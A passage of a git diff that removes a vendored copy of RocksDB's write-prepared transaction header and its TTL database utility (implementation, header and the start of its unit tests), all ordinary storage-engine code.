@@ -1,76 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <atomic>
-#include <mutex>
-#include <stack>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "rocksdb/db.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/snapshot.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "util/autovector.h"
-#include "utilities/transactions/pessimistic_transaction.h"
-#include "utilities/transactions/pessimistic_transaction_db.h"
-#include "utilities/transactions/transaction_base.h"
-#include "utilities/transactions/transaction_util.h"
-
-namespace rocksdb {
-
-class WritePreparedTxnDB;
-
-// This impl could write to DB also uncomitted data and then later tell apart
-// committed data from uncomitted data. Uncommitted data could be after the
-// Prepare phase in 2PC (WritePreparedTxn) or before that
-// (WriteUnpreparedTxnImpl).
-class WritePreparedTxn : public PessimisticTransaction {
- public:
-  WritePreparedTxn(WritePreparedTxnDB* db, const WriteOptions& write_options,
-                   const TransactionOptions& txn_options);
-
-  virtual ~WritePreparedTxn() {}
-
-  Status CommitBatch(WriteBatch* batch) override;
-
-  Status Rollback() override;
-
- private:
-  Status PrepareInternal() override;
-
-  Status CommitWithoutPrepareInternal() override;
-
-  Status CommitInternal() override;
-
-  // TODO(myabandeh): verify that the current impl work with values being
-  // written with prepare sequence number too.
-  // Status ValidateSnapshot(ColumnFamilyHandle* column_family, const Slice&
-  // key,
-  //                        SequenceNumber prev_seqno, SequenceNumber*
-  //                        new_seqno);
-
-  // No copying allowed
-  WritePreparedTxn(const WritePreparedTxn&);
-  void operator=(const WritePreparedTxn&);
-
-  WritePreparedTxnDB* wpt_db_;
-  uint64_t prepare_seq_;
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.cc b/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.cc
deleted file mode 100644
index de3f299..0000000
--- a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.cc
+++ /dev/null
@@ -1,313 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef ROCKSDB_LITE
-
-#include "utilities/ttl/db_ttl_impl.h"
-
-#include "db/write_batch_internal.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "util/coding.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-void DBWithTTLImpl::SanitizeOptions(int32_t ttl, ColumnFamilyOptions* options,
-                                    Env* env) {
-  if (options->compaction_filter) {
-    options->compaction_filter =
-        new TtlCompactionFilter(ttl, env, options->compaction_filter);
-  } else {
-    options->compaction_filter_factory =
-        std::shared_ptr<CompactionFilterFactory>(new TtlCompactionFilterFactory(
-            ttl, env, options->compaction_filter_factory));
-  }
-
-  if (options->merge_operator) {
-    options->merge_operator.reset(
-        new TtlMergeOperator(options->merge_operator, env));
-  }
-}
-
-// Open the db inside DBWithTTLImpl because options needs pointer to its ttl
-DBWithTTLImpl::DBWithTTLImpl(DB* db) : DBWithTTL(db) {}
-
-DBWithTTLImpl::~DBWithTTLImpl() {
-  // Need to stop background compaction before getting rid of the filter
-  CancelAllBackgroundWork(db_, /* wait = */ true);
-  delete GetOptions().compaction_filter;
-}
-
-Status UtilityDB::OpenTtlDB(const Options& options, const std::string& dbname,
-                            StackableDB** dbptr, int32_t ttl, bool read_only) {
-  DBWithTTL* db;
-  Status s = DBWithTTL::Open(options, dbname, &db, ttl, read_only);
-  if (s.ok()) {
-    *dbptr = db;
-  } else {
-    *dbptr = nullptr;
-  }
-  return s;
-}
-
-Status DBWithTTL::Open(const Options& options, const std::string& dbname,
-                       DBWithTTL** dbptr, int32_t ttl, bool read_only) {
-
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, cf_options));
-  std::vector<ColumnFamilyHandle*> handles;
-  Status s = DBWithTTL::Open(db_options, dbname, column_families, &handles,
-                             dbptr, {ttl}, read_only);
-  if (s.ok()) {
-    assert(handles.size() == 1);
-    // i can delete the handle since DBImpl is always holding a reference to
-    // default column family
-    delete handles[0];
-  }
-  return s;
-}
-
-Status DBWithTTL::Open(
-    const DBOptions& db_options, const std::string& dbname,
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    std::vector<ColumnFamilyHandle*>* handles, DBWithTTL** dbptr,
-    std::vector<int32_t> ttls, bool read_only) {
-
-  if (ttls.size() != column_families.size()) {
-    return Status::InvalidArgument(
-        "ttls size has to be the same as number of column families");
-  }
-
-  std::vector<ColumnFamilyDescriptor> column_families_sanitized =
-      column_families;
-  for (size_t i = 0; i < column_families_sanitized.size(); ++i) {
-    DBWithTTLImpl::SanitizeOptions(
-        ttls[i], &column_families_sanitized[i].options,
-        db_options.env == nullptr ? Env::Default() : db_options.env);
-  }
-  DB* db;
-
-  Status st;
-  if (read_only) {
-    st = DB::OpenForReadOnly(db_options, dbname, column_families_sanitized,
-                             handles, &db);
-  } else {
-    st = DB::Open(db_options, dbname, column_families_sanitized, handles, &db);
-  }
-  if (st.ok()) {
-    *dbptr = new DBWithTTLImpl(db);
-  } else {
-    *dbptr = nullptr;
-  }
-  return st;
-}
-
-Status DBWithTTLImpl::CreateColumnFamilyWithTtl(
-    const ColumnFamilyOptions& options, const std::string& column_family_name,
-    ColumnFamilyHandle** handle, int ttl) {
-  ColumnFamilyOptions sanitized_options = options;
-  DBWithTTLImpl::SanitizeOptions(ttl, &sanitized_options, GetEnv());
-
-  return DBWithTTL::CreateColumnFamily(sanitized_options, column_family_name,
-                                       handle);
-}
-
-Status DBWithTTLImpl::CreateColumnFamily(const ColumnFamilyOptions& options,
-                                         const std::string& column_family_name,
-                                         ColumnFamilyHandle** handle) {
-  return CreateColumnFamilyWithTtl(options, column_family_name, handle, 0);
-}
-
-// Appends the current timestamp to the string.
-// Returns false if could not get the current_time, true if append succeeds
-Status DBWithTTLImpl::AppendTS(const Slice& val, std::string* val_with_ts,
-                               Env* env) {
-  val_with_ts->reserve(kTSLength + val.size());
-  char ts_string[kTSLength];
-  int64_t curtime;
-  Status st = env->GetCurrentTime(&curtime);
-  if (!st.ok()) {
-    return st;
-  }
-  EncodeFixed32(ts_string, (int32_t)curtime);
-  val_with_ts->append(val.data(), val.size());
-  val_with_ts->append(ts_string, kTSLength);
-  return st;
-}
-
-// Returns corruption if the length of the string is lesser than timestamp, or
-// timestamp refers to a time lesser than ttl-feature release time
-Status DBWithTTLImpl::SanityCheckTimestamp(const Slice& str) {
-  if (str.size() < kTSLength) {
-    return Status::Corruption("Error: value's length less than timestamp's\n");
-  }
-  // Checks that TS is not lesser than kMinTimestamp
-  // Gaurds against corruption & normal database opened incorrectly in ttl mode
-  int32_t timestamp_value = DecodeFixed32(str.data() + str.size() - kTSLength);
-  if (timestamp_value < kMinTimestamp) {
-    return Status::Corruption("Error: Timestamp < ttl feature release time!\n");
-  }
-  return Status::OK();
-}
-
-// Checks if the string is stale or not according to TTl provided
-bool DBWithTTLImpl::IsStale(const Slice& value, int32_t ttl, Env* env) {
-  if (ttl <= 0) {  // Data is fresh if TTL is non-positive
-    return false;
-  }
-  int64_t curtime;
-  if (!env->GetCurrentTime(&curtime).ok()) {
-    return false;  // Treat the data as fresh if could not get current time
-  }
-  int32_t timestamp_value =
-      DecodeFixed32(value.data() + value.size() - kTSLength);
-  return (timestamp_value + ttl) < curtime;
-}
-
-// Strips the TS from the end of the slice
-Status DBWithTTLImpl::StripTS(PinnableSlice* pinnable_val) {
-  Status st;
-  if (pinnable_val->size() < kTSLength) {
-    return Status::Corruption("Bad timestamp in key-value");
-  }
-  // Erasing characters which hold the TS
-  pinnable_val->remove_suffix(kTSLength);
-  return st;
-}
-
-// Strips the TS from the end of the string
-Status DBWithTTLImpl::StripTS(std::string* str) {
-  Status st;
-  if (str->length() < kTSLength) {
-    return Status::Corruption("Bad timestamp in key-value");
-  }
-  // Erasing characters which hold the TS
-  str->erase(str->length() - kTSLength, kTSLength);
-  return st;
-}
-
-Status DBWithTTLImpl::Put(const WriteOptions& options,
-                          ColumnFamilyHandle* column_family, const Slice& key,
-                          const Slice& val) {
-  WriteBatch batch;
-  batch.Put(column_family, key, val);
-  return Write(options, &batch);
-}
-
-Status DBWithTTLImpl::Get(const ReadOptions& options,
-                          ColumnFamilyHandle* column_family, const Slice& key,
-                          PinnableSlice* value) {
-  Status st = db_->Get(options, column_family, key, value);
-  if (!st.ok()) {
-    return st;
-  }
-  st = SanityCheckTimestamp(*value);
-  if (!st.ok()) {
-    return st;
-  }
-  return StripTS(value);
-}
-
-std::vector<Status> DBWithTTLImpl::MultiGet(
-    const ReadOptions& options,
-    const std::vector<ColumnFamilyHandle*>& column_family,
-    const std::vector<Slice>& keys, std::vector<std::string>* values) {
-  auto statuses = db_->MultiGet(options, column_family, keys, values);
-  for (size_t i = 0; i < keys.size(); ++i) {
-    if (!statuses[i].ok()) {
-      continue;
-    }
-    statuses[i] = SanityCheckTimestamp((*values)[i]);
-    if (!statuses[i].ok()) {
-      continue;
-    }
-    statuses[i] = StripTS(&(*values)[i]);
-  }
-  return statuses;
-}
-
-bool DBWithTTLImpl::KeyMayExist(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family,
-                                const Slice& key, std::string* value,
-                                bool* value_found) {
-  bool ret = db_->KeyMayExist(options, column_family, key, value, value_found);
-  if (ret && value != nullptr && value_found != nullptr && *value_found) {
-    if (!SanityCheckTimestamp(*value).ok() || !StripTS(value).ok()) {
-      return false;
-    }
-  }
-  return ret;
-}
-
-Status DBWithTTLImpl::Merge(const WriteOptions& options,
-                            ColumnFamilyHandle* column_family, const Slice& key,
-                            const Slice& value) {
-  WriteBatch batch;
-  batch.Merge(column_family, key, value);
-  return Write(options, &batch);
-}
-
-Status DBWithTTLImpl::Write(const WriteOptions& opts, WriteBatch* updates) {
-  class Handler : public WriteBatch::Handler {
-   public:
-    explicit Handler(Env* env) : env_(env) {}
-    WriteBatch updates_ttl;
-    Status batch_rewrite_status;
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) override {
-      std::string value_with_ts;
-      Status st = AppendTS(value, &value_with_ts, env_);
-      if (!st.ok()) {
-        batch_rewrite_status = st;
-      } else {
-        WriteBatchInternal::Put(&updates_ttl, column_family_id, key,
-                                value_with_ts);
-      }
-      return Status::OK();
-    }
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) override {
-      std::string value_with_ts;
-      Status st = AppendTS(value, &value_with_ts, env_);
-      if (!st.ok()) {
-        batch_rewrite_status = st;
-      } else {
-        WriteBatchInternal::Merge(&updates_ttl, column_family_id, key,
-                                  value_with_ts);
-      }
-      return Status::OK();
-    }
-    virtual Status DeleteCF(uint32_t column_family_id,
-                            const Slice& key) override {
-      WriteBatchInternal::Delete(&updates_ttl, column_family_id, key);
-      return Status::OK();
-    }
-    virtual void LogData(const Slice& blob) override {
-      updates_ttl.PutLogData(blob);
-    }
-
-   private:
-    Env* env_;
-  };
-  Handler handler(GetEnv());
-  updates->Iterate(&handler);
-  if (!handler.batch_rewrite_status.ok()) {
-    return handler.batch_rewrite_status;
-  } else {
-    return db_->Write(opts, &(handler.updates_ttl));
-  }
-}
-
-Iterator* DBWithTTLImpl::NewIterator(const ReadOptions& opts,
-                                     ColumnFamilyHandle* column_family) {
-  return new TtlIterator(db_->NewIterator(opts, column_family));
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.h b/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.h
deleted file mode 100644
index ab2b8cd..0000000
--- a/thirdparty/rocksdb/utilities/ttl/db_ttl_impl.h
+++ /dev/null
@@ -1,347 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/utility_db.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "db/db_impl.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef GetCurrentTime
-#endif
-
-
-namespace rocksdb {
-
-class DBWithTTLImpl : public DBWithTTL {
- public:
-  static void SanitizeOptions(int32_t ttl, ColumnFamilyOptions* options,
-                              Env* env);
-
-  explicit DBWithTTLImpl(DB* db);
-
-  virtual ~DBWithTTLImpl();
-
-  Status CreateColumnFamilyWithTtl(const ColumnFamilyOptions& options,
-                                   const std::string& column_family_name,
-                                   ColumnFamilyHandle** handle,
-                                   int ttl) override;
-
-  Status CreateColumnFamily(const ColumnFamilyOptions& options,
-                            const std::string& column_family_name,
-                            ColumnFamilyHandle** handle) override;
-
-  using StackableDB::Put;
-  virtual Status Put(const WriteOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     const Slice& val) override;
-
-  using StackableDB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override;
-
-  using StackableDB::MultiGet;
-  virtual std::vector<Status> MultiGet(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_family,
-      const std::vector<Slice>& keys,
-      std::vector<std::string>* values) override;
-
-  using StackableDB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override;
-
-  using StackableDB::Merge;
-  virtual Status Merge(const WriteOptions& options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       const Slice& value) override;
-
-  virtual Status Write(const WriteOptions& opts, WriteBatch* updates) override;
-
-  using StackableDB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& opts,
-                                ColumnFamilyHandle* column_family) override;
-
-  virtual DB* GetBaseDB() override { return db_; }
-
-  static bool IsStale(const Slice& value, int32_t ttl, Env* env);
-
-  static Status AppendTS(const Slice& val, std::string* val_with_ts, Env* env);
-
-  static Status SanityCheckTimestamp(const Slice& str);
-
-  static Status StripTS(std::string* str);
-
-  static Status StripTS(PinnableSlice* str);
-
-  static const uint32_t kTSLength = sizeof(int32_t);  // size of timestamp
-
-  static const int32_t kMinTimestamp = 1368146402;  // 05/09/2013:5:40PM GMT-8
-
-  static const int32_t kMaxTimestamp = 2147483647;  // 01/18/2038:7:14PM GMT-8
-};
-
-class TtlIterator : public Iterator {
-
- public:
-  explicit TtlIterator(Iterator* iter) : iter_(iter) { assert(iter_); }
-
-  ~TtlIterator() { delete iter_; }
-
-  bool Valid() const override { return iter_->Valid(); }
-
-  void SeekToFirst() override { iter_->SeekToFirst(); }
-
-  void SeekToLast() override { iter_->SeekToLast(); }
-
-  void Seek(const Slice& target) override { iter_->Seek(target); }
-
-  void SeekForPrev(const Slice& target) override { iter_->SeekForPrev(target); }
-
-  void Next() override { iter_->Next(); }
-
-  void Prev() override { iter_->Prev(); }
-
-  Slice key() const override { return iter_->key(); }
-
-  int32_t timestamp() const {
-    return DecodeFixed32(iter_->value().data() + iter_->value().size() -
-                         DBWithTTLImpl::kTSLength);
-  }
-
-  Slice value() const override {
-    // TODO: handle timestamp corruption like in general iterator semantics
-    assert(DBWithTTLImpl::SanityCheckTimestamp(iter_->value()).ok());
-    Slice trimmed_value = iter_->value();
-    trimmed_value.size_ -= DBWithTTLImpl::kTSLength;
-    return trimmed_value;
-  }
-
-  Status status() const override { return iter_->status(); }
-
- private:
-  Iterator* iter_;
-};
-
-class TtlCompactionFilter : public CompactionFilter {
- public:
-  TtlCompactionFilter(
-      int32_t ttl, Env* env, const CompactionFilter* user_comp_filter,
-      std::unique_ptr<const CompactionFilter> user_comp_filter_from_factory =
-          nullptr)
-      : ttl_(ttl),
-        env_(env),
-        user_comp_filter_(user_comp_filter),
-        user_comp_filter_from_factory_(
-            std::move(user_comp_filter_from_factory)) {
-    // Unlike the merge operator, compaction filter is necessary for TTL, hence
-    // this would be called even if user doesn't specify any compaction-filter
-    if (!user_comp_filter_) {
-      user_comp_filter_ = user_comp_filter_from_factory_.get();
-    }
-  }
-
-  virtual bool Filter(int level, const Slice& key, const Slice& old_val,
-                      std::string* new_val, bool* value_changed) const
-      override {
-    if (DBWithTTLImpl::IsStale(old_val, ttl_, env_)) {
-      return true;
-    }
-    if (user_comp_filter_ == nullptr) {
-      return false;
-    }
-    assert(old_val.size() >= DBWithTTLImpl::kTSLength);
-    Slice old_val_without_ts(old_val.data(),
-                             old_val.size() - DBWithTTLImpl::kTSLength);
-    if (user_comp_filter_->Filter(level, key, old_val_without_ts, new_val,
-                                  value_changed)) {
-      return true;
-    }
-    if (*value_changed) {
-      new_val->append(
-          old_val.data() + old_val.size() - DBWithTTLImpl::kTSLength,
-          DBWithTTLImpl::kTSLength);
-    }
-    return false;
-  }
-
-  virtual const char* Name() const override { return "Delete By TTL"; }
-
- private:
-  int32_t ttl_;
-  Env* env_;
-  const CompactionFilter* user_comp_filter_;
-  std::unique_ptr<const CompactionFilter> user_comp_filter_from_factory_;
-};
-
-class TtlCompactionFilterFactory : public CompactionFilterFactory {
- public:
-  TtlCompactionFilterFactory(
-      int32_t ttl, Env* env,
-      std::shared_ptr<CompactionFilterFactory> comp_filter_factory)
-      : ttl_(ttl), env_(env), user_comp_filter_factory_(comp_filter_factory) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    std::unique_ptr<const CompactionFilter> user_comp_filter_from_factory =
-        nullptr;
-    if (user_comp_filter_factory_) {
-      user_comp_filter_from_factory =
-          user_comp_filter_factory_->CreateCompactionFilter(context);
-    }
-
-    return std::unique_ptr<TtlCompactionFilter>(new TtlCompactionFilter(
-        ttl_, env_, nullptr, std::move(user_comp_filter_from_factory)));
-  }
-
-  virtual const char* Name() const override {
-    return "TtlCompactionFilterFactory";
-  }
-
- private:
-  int32_t ttl_;
-  Env* env_;
-  std::shared_ptr<CompactionFilterFactory> user_comp_filter_factory_;
-};
-
-class TtlMergeOperator : public MergeOperator {
-
- public:
-  explicit TtlMergeOperator(const std::shared_ptr<MergeOperator>& merge_op,
-                            Env* env)
-      : user_merge_op_(merge_op), env_(env) {
-    assert(merge_op);
-    assert(env);
-  }
-
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    const uint32_t ts_len = DBWithTTLImpl::kTSLength;
-    if (merge_in.existing_value && merge_in.existing_value->size() < ts_len) {
-      ROCKS_LOG_ERROR(merge_in.logger,
-                      "Error: Could not remove timestamp from existing value.");
-      return false;
-    }
-
-    // Extract time-stamp from each operand to be passed to user_merge_op_
-    std::vector<Slice> operands_without_ts;
-    for (const auto& operand : merge_in.operand_list) {
-      if (operand.size() < ts_len) {
-        ROCKS_LOG_ERROR(
-            merge_in.logger,
-            "Error: Could not remove timestamp from operand value.");
-        return false;
-      }
-      operands_without_ts.push_back(operand);
-      operands_without_ts.back().remove_suffix(ts_len);
-    }
-
-    // Apply the user merge operator (store result in *new_value)
-    bool good = true;
-    MergeOperationOutput user_merge_out(merge_out->new_value,
-                                        merge_out->existing_operand);
-    if (merge_in.existing_value) {
-      Slice existing_value_without_ts(merge_in.existing_value->data(),
-                                      merge_in.existing_value->size() - ts_len);
-      good = user_merge_op_->FullMergeV2(
-          MergeOperationInput(merge_in.key, &existing_value_without_ts,
-                              operands_without_ts, merge_in.logger),
-          &user_merge_out);
-    } else {
-      good = user_merge_op_->FullMergeV2(
-          MergeOperationInput(merge_in.key, nullptr, operands_without_ts,
-                              merge_in.logger),
-          &user_merge_out);
-    }
-
-    // Return false if the user merge operator returned false
-    if (!good) {
-      return false;
-    }
-
-    if (merge_out->existing_operand.data()) {
-      merge_out->new_value.assign(merge_out->existing_operand.data(),
-                                  merge_out->existing_operand.size());
-      merge_out->existing_operand = Slice(nullptr, 0);
-    }
-
-    // Augment the *new_value with the ttl time-stamp
-    int64_t curtime;
-    if (!env_->GetCurrentTime(&curtime).ok()) {
-      ROCKS_LOG_ERROR(
-          merge_in.logger,
-          "Error: Could not get current time to be attached internally "
-          "to the new value.");
-      return false;
-    } else {
-      char ts_string[ts_len];
-      EncodeFixed32(ts_string, (int32_t)curtime);
-      merge_out->new_value.append(ts_string, ts_len);
-      return true;
-    }
-  }
-
-  virtual bool PartialMergeMulti(const Slice& key,
-                                 const std::deque<Slice>& operand_list,
-                                 std::string* new_value, Logger* logger) const
-      override {
-    const uint32_t ts_len = DBWithTTLImpl::kTSLength;
-    std::deque<Slice> operands_without_ts;
-
-    for (const auto& operand : operand_list) {
-      if (operand.size() < ts_len) {
-        ROCKS_LOG_ERROR(logger,
-                        "Error: Could not remove timestamp from value.");
-        return false;
-      }
-
-      operands_without_ts.push_back(
-          Slice(operand.data(), operand.size() - ts_len));
-    }
-
-    // Apply the user partial-merge operator (store result in *new_value)
-    assert(new_value);
-    if (!user_merge_op_->PartialMergeMulti(key, operands_without_ts, new_value,
-                                           logger)) {
-      return false;
-    }
-
-    // Augment the *new_value with the ttl time-stamp
-    int64_t curtime;
-    if (!env_->GetCurrentTime(&curtime).ok()) {
-      ROCKS_LOG_ERROR(
-          logger,
-          "Error: Could not get current time to be attached internally "
-          "to the new value.");
-      return false;
-    } else {
-      char ts_string[ts_len];
-      EncodeFixed32(ts_string, (int32_t)curtime);
-      new_value->append(ts_string, ts_len);
-      return true;
-    }
-  }
-
-  virtual const char* Name() const override { return "Merge By TTL"; }
-
- private:
-  std::shared_ptr<MergeOperator> user_merge_op_;
-  Env* env_;
-};
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/ttl/ttl_test.cc b/thirdparty/rocksdb/utilities/ttl/ttl_test.cc
deleted file mode 100644
index 586d0ce..0000000
--- a/thirdparty/rocksdb/utilities/ttl/ttl_test.cc
+++ /dev/null
@@ -1,645 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <map>
-#include <memory>
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "util/string_util.h"
-#include "util/testharness.h"
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-
-namespace rocksdb {
-
-namespace {
-
-typedef std::map<std::string, std::string> KVMap;
-
-enum BatchOperation { OP_PUT = 0, OP_DELETE = 1 };
-}
-
-class SpecialTimeEnv : public EnvWrapper {
- public:
-  explicit SpecialTimeEnv(Env* base) : EnvWrapper(base) {
-    base->GetCurrentTime(&current_time_);
-  }
-
-  void Sleep(int64_t sleep_time) { current_time_ += sleep_time; }
-  virtual Status GetCurrentTime(int64_t* current_time) override {
-    *current_time = current_time_;
-    return Status::OK();
-  }
-
- private:
-  int64_t current_time_ = 0;
-};
-
-class TtlTest : public testing::Test {
- public:
-  TtlTest() {
-    env_.reset(new SpecialTimeEnv(Env::Default()));
-    dbname_ = test::TmpDir() + "/db_ttl";
-    options_.create_if_missing = true;
-    options_.env = env_.get();
-    // ensure that compaction is kicked in to always strip timestamp from kvs
-    options_.max_compaction_bytes = 1;
-    // compaction should take place always from level0 for determinism
-    db_ttl_ = nullptr;
-    DestroyDB(dbname_, Options());
-  }
-
-  ~TtlTest() {
-    CloseTtl();
-    DestroyDB(dbname_, Options());
-  }
-
-  // Open database with TTL support when TTL not provided with db_ttl_ pointer
-  void OpenTtl() {
-    ASSERT_TRUE(db_ttl_ ==
-                nullptr);  //  db should be closed before opening again
-    ASSERT_OK(DBWithTTL::Open(options_, dbname_, &db_ttl_));
-  }
-
-  // Open database with TTL support when TTL provided with db_ttl_ pointer
-  void OpenTtl(int32_t ttl) {
-    ASSERT_TRUE(db_ttl_ == nullptr);
-    ASSERT_OK(DBWithTTL::Open(options_, dbname_, &db_ttl_, ttl));
-  }
-
-  // Open with TestFilter compaction filter
-  void OpenTtlWithTestCompaction(int32_t ttl) {
-    options_.compaction_filter_factory =
-      std::shared_ptr<CompactionFilterFactory>(
-          new TestFilterFactory(kSampleSize_, kNewValue_));
-    OpenTtl(ttl);
-  }
-
-  // Open database with TTL support in read_only mode
-  void OpenReadOnlyTtl(int32_t ttl) {
-    ASSERT_TRUE(db_ttl_ == nullptr);
-    ASSERT_OK(DBWithTTL::Open(options_, dbname_, &db_ttl_, ttl, true));
-  }
-
-  void CloseTtl() {
-    delete db_ttl_;
-    db_ttl_ = nullptr;
-  }
-
-  // Populates and returns a kv-map
-  void MakeKVMap(int64_t num_entries) {
-    kvmap_.clear();
-    int digits = 1;
-    for (int64_t dummy = num_entries; dummy /= 10; ++digits) {
-    }
-    int digits_in_i = 1;
-    for (int64_t i = 0; i < num_entries; i++) {
-      std::string key = "key";
-      std::string value = "value";
-      if (i % 10 == 0) {
-        digits_in_i++;
-      }
-      for(int j = digits_in_i; j < digits; j++) {
-        key.append("0");
-        value.append("0");
-      }
-      AppendNumberTo(&key, i);
-      AppendNumberTo(&value, i);
-      kvmap_[key] = value;
-    }
-    ASSERT_EQ(static_cast<int64_t>(kvmap_.size()),
-              num_entries);  // check all insertions done
-  }
-
-  // Makes a write-batch with key-vals from kvmap_ and 'Write''s it
-  void MakePutWriteBatch(const BatchOperation* batch_ops, int64_t num_ops) {
-    ASSERT_LE(num_ops, static_cast<int64_t>(kvmap_.size()));
-    static WriteOptions wopts;
-    static FlushOptions flush_opts;
-    WriteBatch batch;
-    kv_it_ = kvmap_.begin();
-    for (int64_t i = 0; i < num_ops && kv_it_ != kvmap_.end(); i++, ++kv_it_) {
-      switch (batch_ops[i]) {
-        case OP_PUT:
-          batch.Put(kv_it_->first, kv_it_->second);
-          break;
-        case OP_DELETE:
-          batch.Delete(kv_it_->first);
-          break;
-        default:
-          FAIL();
-      }
-    }
-    db_ttl_->Write(wopts, &batch);
-    db_ttl_->Flush(flush_opts);
-  }
-
-  // Puts num_entries starting from start_pos_map from kvmap_ into the database
-  void PutValues(int64_t start_pos_map, int64_t num_entries, bool flush = true,
-                 ColumnFamilyHandle* cf = nullptr) {
-    ASSERT_TRUE(db_ttl_);
-    ASSERT_LE(start_pos_map + num_entries, static_cast<int64_t>(kvmap_.size()));
-    static WriteOptions wopts;
-    static FlushOptions flush_opts;
-    kv_it_ = kvmap_.begin();
-    advance(kv_it_, start_pos_map);
-    for (int64_t i = 0; kv_it_ != kvmap_.end() && i < num_entries;
-         i++, ++kv_it_) {
-      ASSERT_OK(cf == nullptr
-                    ? db_ttl_->Put(wopts, kv_it_->first, kv_it_->second)
-                    : db_ttl_->Put(wopts, cf, kv_it_->first, kv_it_->second));
-    }
-    // Put a mock kv at the end because CompactionFilter doesn't delete last key
-    ASSERT_OK(cf == nullptr ? db_ttl_->Put(wopts, "keymock", "valuemock")
-                            : db_ttl_->Put(wopts, cf, "keymock", "valuemock"));
-    if (flush) {
-      if (cf == nullptr) {
-        db_ttl_->Flush(flush_opts);
-      } else {
-        db_ttl_->Flush(flush_opts, cf);
-      }
-    }
-  }
-
-  // Runs a manual compaction
-  void ManualCompact(ColumnFamilyHandle* cf = nullptr) {
-    if (cf == nullptr) {
-      db_ttl_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    } else {
-      db_ttl_->CompactRange(CompactRangeOptions(), cf, nullptr, nullptr);
-    }
-  }
-
-  // checks the whole kvmap_ to return correct values using KeyMayExist
-  void SimpleKeyMayExistCheck() {
-    static ReadOptions ropts;
-    bool value_found;
-    std::string val;
-    for(auto &kv : kvmap_) {
-      bool ret = db_ttl_->KeyMayExist(ropts, kv.first, &val, &value_found);
-      if (ret == false || value_found == false) {
-        fprintf(stderr, "KeyMayExist could not find key=%s in the database but"
-                        " should have\n", kv.first.c_str());
-        FAIL();
-      } else if (val.compare(kv.second) != 0) {
-        fprintf(stderr, " value for key=%s present in database is %s but"
-                        " should be %s\n", kv.first.c_str(), val.c_str(),
-                        kv.second.c_str());
-        FAIL();
-      }
-    }
-  }
-
-  // checks the whole kvmap_ to return correct values using MultiGet
-  void SimpleMultiGetTest() {
-    static ReadOptions ropts;
-    std::vector<Slice> keys;
-    std::vector<std::string> values;
-
-    for (auto& kv : kvmap_) {
-      keys.emplace_back(kv.first);
-    }
-
-    auto statuses = db_ttl_->MultiGet(ropts, keys, &values);
-    size_t i = 0;
-    for (auto& kv : kvmap_) {
-      ASSERT_OK(statuses[i]);
-      ASSERT_EQ(values[i], kv.second);
-      ++i;
-    }
-  }
-
-  // Sleeps for slp_tim then runs a manual compaction
-  // Checks span starting from st_pos from kvmap_ in the db and
-  // Gets should return true if check is true and false otherwise
-  // Also checks that value that we got is the same as inserted; and =kNewValue
-  //   if test_compaction_change is true
-  void SleepCompactCheck(int slp_tim, int64_t st_pos, int64_t span,
